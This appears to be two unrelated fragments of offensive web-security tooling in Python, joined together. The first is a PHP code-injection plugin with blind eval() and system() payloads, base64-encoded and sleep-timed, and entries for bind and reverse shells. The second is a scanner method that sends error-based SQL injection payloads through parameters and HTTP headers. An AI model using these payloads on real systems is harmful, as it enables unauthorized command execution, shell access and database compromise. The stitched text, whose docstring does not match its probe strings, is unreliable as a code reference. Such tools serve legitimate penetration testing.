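            'call': 'evaluate_blind',
            'test_bool_true': """True""",
            'test_bool_false': """False"""
        },
        'evaluate_blind': {
            'call': 'inject',
            'evaluate_blind': """$d="%(code_b64)s";eval("return (" . base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)) . ") && sleep(%(delay)i);");"""
        },
        'execute_blind': {
            'call': 'inject',
            # the line break inside the PHP concatenation is harmless
            'execute_blind': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)). 
" && sleep %(delay)i");"""
        },
        'bind_shell': {
            'call': 'execute_blind',
            'bind_shell': bash.bind_shell
        },
        'reverse_shell': {
            'call': 'execute_blind',
            'reverse_shell': bash.reverse_shell
        },
    })
    self.set_contexts([
        # Text context, no closures
        {'level': 0},
        # This terminates the statement with ;
        {'level': 1, 'prefix': '%(closure)s;', 'suffix': '//', 'closures': ctx_closures},
        # This does not need termination e.g. if(%s) {}
        {'level': 2, 'prefix': '%(closure)s', 'suffix': '//', 'closures': ctx_closures},
        # Comment blocks
        {'level': 5, 'prefix': '*/', 'suffix': '/*'},
    ])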
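def verify(self):
    """Threaded error-based SQL injection probe over parameters and request headers.

    Skips extensions in ``notAcceptedExt`` and the Tomcat sample paths
    (``/examples/``, ``/docs/``).  Parameter probes are fanned out through
    ``self.args_inject``; when ``plugin_set["sqli"]["header_inject"]`` is
    set, the same payloads are also placed in User-Agent, Referer,
    X-Forwarded-For, Real-Ip and X-Forwarded-Host and fanned out through
    ``self.header_inject``.  Every MD5 payload embeds ``md5(<random>)``; for
    the header path the seed travels only inside the payload string.

    Changes: the quote-fuzz probes are written with an explicit ``\\\\(``
    (``'\\('`` was an invalid escape), and the two exact-duplicate
    extractvalue payloads were dropped so each probe is sent once.
    """
    if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
        return
    self.parser = dictdata_parser(self.dictdata)
    # Blacklist: Tomcat's bundled example/doc apps are noise.
    path = self.dictdata.get("url").get("path")
    if path.startswith("/examples/") or path.startswith("/docs/"):
        return
    random_num = get_random_num(8)
    random_num_md5 = getmd5(random_num)
    # (payload, expected_md5 or None, method): "a" presumably appends to the
    # current value, "w" replaces it — confirm in dictdata_parser.
    payloads = [
        ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(random_num), random_num_md5, "a"),
        ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(random_num), random_num_md5, "a"),
        ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(random_num), random_num_md5, "a"),
        ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(random_num), random_num_md5, "a"),
        ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0".format(random_num), random_num_md5, "a"),
        ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'.format(random_num), random_num_md5, "a"),
        ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num), random_num_md5, "a"),
        ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".format(random_num), random_num_md5, "w"),
        ("extractvalue(1,concat(char(126),md5({})))".format(random_num), random_num_md5, "w"),
    ]
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    reqs = []
    if params:
        for param in params:
            for payload, search_str, method in [('鎈\'"\\(', None, "a")] + payloads:
                req = self.parser.getreqfromparam(param, method, payload)
                reqs.append((req, payload, search_str, random_num_md5, param))
    mythread(self.args_inject, reqs, cmd_line_options.threads)

    # header injection
    if not plugin_set.get("sqli").get("header_inject"):
        return
    header_msg = {
        "User-Agent": {
            "msg": "sqli_error_ua",
            "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36",
        },
        "Referer": {
            "msg": "sqli_error_referer",
            "default": "https://www.qq.com/search",
        },
        "X-Forwarded-For": {
            "msg": "sqli_error_xff",
            "default": "12.40.9.144",
        },
        # NOTE(review): "Real-Ip" is not the conventional "X-Real-IP" header
        # name — confirm it is intentional.
        "Real-Ip": {
            "msg": "sqli_error_ri",
            "default": "2.40.9.144",
        },
        "X-Forwarded-Host": {
            "msg": "sqli_error_xfh",
            "default": "2.40.9.144",
        },
    }
    reqs = []
    for k, v in header_msg.items():
        if not self.output(v.get("msg")):
            continue
        logger.debug("start {} inject ".format(k))
        headers = copy.deepcopy(self.dictdata.get("request").get("headers"))
        if k not in headers.keys():
            headers[k] = v.get("default")
        for payload, search_str, method in [('\'"\\(', None, "a")] + payloads:
            headers_withpayload = copy.deepcopy(headers)
            headers_withpayload[k] = headers_withpayload[k] + payload if method == "a" else payload
            req = self.parser.generaterequest({"headers": headers_withpayload})
            reqs.append((req, (payload, search_str, k, v.get("msg"))))
    mythread(self.header_inject, reqs, cmd_line_options.threads)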